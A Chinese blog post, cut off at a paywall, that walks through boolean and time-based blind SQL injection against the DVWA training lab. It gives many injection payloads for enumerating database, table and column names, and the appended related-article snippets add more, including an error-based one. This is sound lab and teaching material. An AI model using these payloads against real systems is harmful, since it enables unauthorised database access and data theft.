DVWA之sql盲注

最新推荐文章于 2024-04-08 14:44:20 发布
最新推荐文章于 2024-04-08 14:44:20 发布
阅读量2.8k 收藏 25
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39670065/article/details/107875210
版权

写在前面:
当时刷sqli-labs也浑浑噩噩没有做啥总结,现在就先从sql盲注总结开始吧

SQL Injection(Blind)

SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知

sql盲注又分为布尔盲注时间盲注基于报错的盲注

理论上,能够布尔盲注就一定能时间盲注,能够时间盲注不一定能布尔盲注。相比之下,布尔盲注稳定性更好,时间盲注适用范围更广,但因为时间盲注的实现原理是基于timeout的,稳定性与效率不如布尔注入。在盲注测试时,通常先测试是否可以布尔盲注,若不行再尝试时间盲注。

先逐个来学习一下

布尔盲注

1.布尔盲注利用前提
页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入。
2.布尔盲注利用    
该语句判断数据库个数,当数据库个数大于n页面显示正常
(select count(schema_name) from information_schema.schemata)> n

该语句判断数据库内第一个数据库名有多少字符,字符个数大于n页面显示正常
(select length(schema_name) from information_schema.schemata limit 0,1)> n

该语句判断第一个库第一个字符是什么,ascii值大于n页面显示正常
(select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))>n

相关函数学习
Length() 返回字符串的长度
substr() 截取字符串,偏移是从1开始,而不是0开始
ascii() 返回字符的ascii码
count(column_name) 返回指定列的值的数目(NULL 不计入)

时间盲注

1.时间盲注利用前提
页面上没有显示位,也没有输出SQL语句执行错误信息。 正确的SQL语句和错误的SQL语句返回页面都一样,但是加入sleep(5)条件之后,页面的返回速度明显慢了5秒。
2.时间盲注利用
该语句判断数据库个数,当数据库个数等于n页面返回延迟5秒
if((select count(schema_name) from information_schema.schemata)=n,sleep(5),1)

该语句判断数据库内第一个数据库名有多少字符,字符个数等于n页面返回延迟5秒
if((select length(schema_name) from information_schema.schemata limit 0,1)=n,sleep(5),1)

该语句判断第一个库第一个字符是什么,ascii值等于n页面返回延迟5秒
if((select ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))=n,sleep(5),1)

相关函数学习
Length()函数 返回字符串的长度
substr()截取字符串
ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
count(column_name)函数返回指定列的值的数目(NULL 不计入)

low

输入1显示存在
在这里插入图片描述
输入1 and 1=1 或 1 and 1=2均显示存在

输入1' and 1=1 #显示存在
在这里插入图片描述
输入1'and 1=2 #不存在

在这里插入图片描述存在字符型盲注

布尔盲注

  1. 查数据库前要先判断数据库的长度
    依次输入1' and length(database())=x #(x为大于等于1的整数)
    当显示存在时即为数据库长度
    发现当x=4时显示存在,故数据库长度为4

  2. 二分法找数据库名
    依次输入1' and ascii(substr(databse(),1,1))>或<字母的ascii值 #通过比较输入字母的ascii值的显示正常与否来逐个确定库名

    输入1’ and ascii(substr(databse(),1,1))>97 #,显示存在,说明数据库名的第一个字符的ascii值大于97(小写字母a的ascii值);
    输入1’ and ascii(substr(databse(),1,1))<122 #,显示存在,说明数据库名的第一个字符的ascii值小于122(小写字母z的ascii值);
    输入1’ and ascii(substr(databse(),1,1))<109 #,显示存在,说明数据库名的第一个字符的ascii值小于109(小写字母m的ascii值);

    重复上述步骤,就可以得到完整的数据库名dvwa

  3. 找数据库中的表
    首先确定数据库中表的数量
    1' and (select count (table_name) from information_schema.tables where table_schema=database())=x # (x为大于等于1的整数)
    当显示存在时即可判断表的数量
    最终当x=2显示存在即表的数量为2

    然后确定表的长度
    1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=x #(x为大于等于1的整数)
    当显示存在时即可判断表的长度
    当x=9显示存在即表的长度为9

    然后同样二分法确定表名
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>或<字母的ascii值 #
    通过比较输入字母的ascii值的显示正常与否来逐个确定表名

    1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 显示存在
    1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 显示存在

    重复上述步骤可得到出两个表名guestbook、users

  4. 找表中的字段
    首先找到字段的数量
    1' and (select count(column_name) from information_schema.columns where table_name= 'users')=x #
    当显示存在时即为字段数
    最后当x=8时显示存在即字段数users字段数为8

    然后找字段名
    1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=x #
    当x=7时显示存在即users表的第一个字段为7个字符长度

    最后也是二分法确定字段名

时间盲注

  1. 判断注入类型

输入1’ and sleep(6) #,有明显延迟;
输入1 and sleep(6) #,没有延迟;

说明为字符型盲注

  1. 找库名

先确定库名长

1' and if(length(database())=1,sleep(5),1) # 没有延迟
1' and if(length(database())=2,sleep(5),1) # 没有延迟
1' and if(length(database())=3,sleep(5),1) # 没有延迟
1' and if(length(database())=4,sleep(5),1
最低0.47元/天 解锁文章
wu_ceng
关注
  • 4
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
DVWA——sql
weixin_44743506的博客
08-23 2539
一、sql入区别: 只回复是或否,Sql入回复详细信息; 过程: 1、判断是否存在入,入时字符型还是数字型 2、猜解数据库的长度,猜解数据库的名称 3、猜解数据库中有几个表,猜解表的长度,猜解表的名称 4、猜解表中有几个字段、猜解字段长度,猜解字段名称 5、猜解数据 类型: 基于布尔型的 基于时间的 基于报错的 二、思路 手工,因为服...
DVWA靶机sql
qq_43623470的博客
01-16 2487
1,将dvwa的安全等级改为low 2,查看源代码,发现没有过滤 3,输入1,判断入类型是数字型还是字符型 发现返回,得知是数字型。 4,1’ 报错得知存在入点 5,输入1’ order by 1# 6,输入1’ order by 2# 7,输入 1’ order by 3# 报错,得知字段不超过3。 8,输入 1’ union select 1,2# 返回1和2 9,输入 1...
DVWA——SQL(全等级)
@一只躺平的猪@的博客
07-13 5518
SQL与一般入的区别在于:一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错入,本章主要介绍布尔。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWAsql入——
Williamanddog的博客
12-22 3041
DVWA
dvwaSQL
ANDTM的博客
05-30 971
SQL入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQLSQL入的区别就是它不会有完整的回显,这里分为两种,一种是布尔,另一种是时间
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL,包括脚本)
weixin_45116657的博客
08-25 4544
目录: 一、SQL SQLSQL入的区别; SQL的过程; 二、实验环境 三、实验过程 基于布尔值的; 基于时间的; 一、SQL简介 1、SQLSQL Injection(Blind),即SQL,目标只会回复是或不是,没有详细内容; 入:可以查看详细的内容 2、手工思路: 手工的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA------SQL Injection (Blind)(SQL
m0_65712192的博客
12-09 2739
DVWA------SQL Injection (Blind)(SQL
DVWA靶场-SQL Injection (Blind)SQL
mlws1900的博客
03-19 1436
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。length:正整数,指定将从左边返回的字符数。
DVWA-SQL脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
SQLmedium.pdf
05-13
本文档主要讲解SQL的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个开源的Web应用安全测试...
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
这个平台提供了多种类型的SQL入场景,包括、时间基入、联合查询入等,帮助用户深入理解SQL入的工作原理和防范方法。 使用这些工具,初学者可以学习到Web应用程序安全的基础知识,而专业人士则可以提升...
网络安全原理与应用:SQL.pptx
05-16
【网络安全原理与应用:SQLSQL是一种针对Web应用程序的安全漏洞利用技术,它主要发生在应用程序未能正确过滤或转义用户输入的SQL查询时。与传统的SQL入不同,并不直接显示入语句的执行结果,...
DVWA下的SQL Injection(Blind)
07-25
DVWA】20. SQL Injection (Blind)SQL(全等级Sqlmap版)
Zichel77的博客
04-08 1757
,有两种主要类型,包括布尔和时间
DVWA靶场中SQL
剁椒鱼头没剁椒的博客
12-13 5971
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型入。
DVWA——SQL入+
qq_58553228的博客
06-02 1167
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
DVWASQL入(
天空之蓝的博客
11-17 2701
SQL Injection(Blind),即SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL入漏洞大多是SQL。手工的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWASQL Injection(Blind)
谢公子的博客
08-05 2765
SQL Injection(Blind) SQL Injection(Blind),即SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL入漏洞大多是SQL。 手工思路 手工的过程,就像你与一个机器人聊天,...
基于Springboot的在线英语阅读平台的设计与实现论文
最新发布
07-16
传统方式管理信息存在诸多不足,如耗时较长、数据错误率高、错误数据更正困难以及数据检索繁琐费力。因此,通过在计算机上部署在线英语阅读分级平台软件,可以充分发挥其高效的信息处理能力,从而规范信息管理流程,使管理工作更加系统化和程序化。同时,该平台的有效应用还能助力管理人员准确快速地处理信息。 在开发工具的选择上,在线英语阅读分级平台经过慎重考虑,为便于开发实现,选用了IDEA作为开发工具,并采用Mysql作为数据库工具。以此为基础搭建开发环境,实现在线英语阅读分级平台的各项功能,包括管理员对用户和新闻公告的管理。 作为一款基于软件开发技术设计实现的应用系统,在线英语阅读分级平台在信息处理方面表现出色,无论是数据添加、数据维护和统计,还是数据查询等处理需求,该平台都能轻松应对。
dvwa靶场sql
08-15
靶场SQL是指在DVWA(Damn Vulnerable Web Application)这个靶场中进行的SQL入攻击。靶场中有一个名为dvwa的数据库,我们可以通过一系列的入语句来探测这个数据库中的表的数量和表名的长度。 首先,通过布尔的方式,我们可以使用一些条件语句来判断表的数量。比如,我们可以使用以下语句来判断表的数量是否为1: ```sql 1' and (select count(table_name) from information_schema.tables where table_schema=database())=1# ``` 如果返回结果为真,则说明表的数量为1。同样地,我们可以使用以下语句来判断表的数量是否大于2: ```sql 1' and (select count(table_name) from information_schema.tables where table_schema=database())>2# ``` 如果返回结果为假,则说明表的数量大于2。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA——SQL(全等级)](https://blog.csdn.net/qq_45833260/article/details/125762606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [DVWAsql入——](https://blog.csdn.net/Williamanddog/article/details/128404430)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值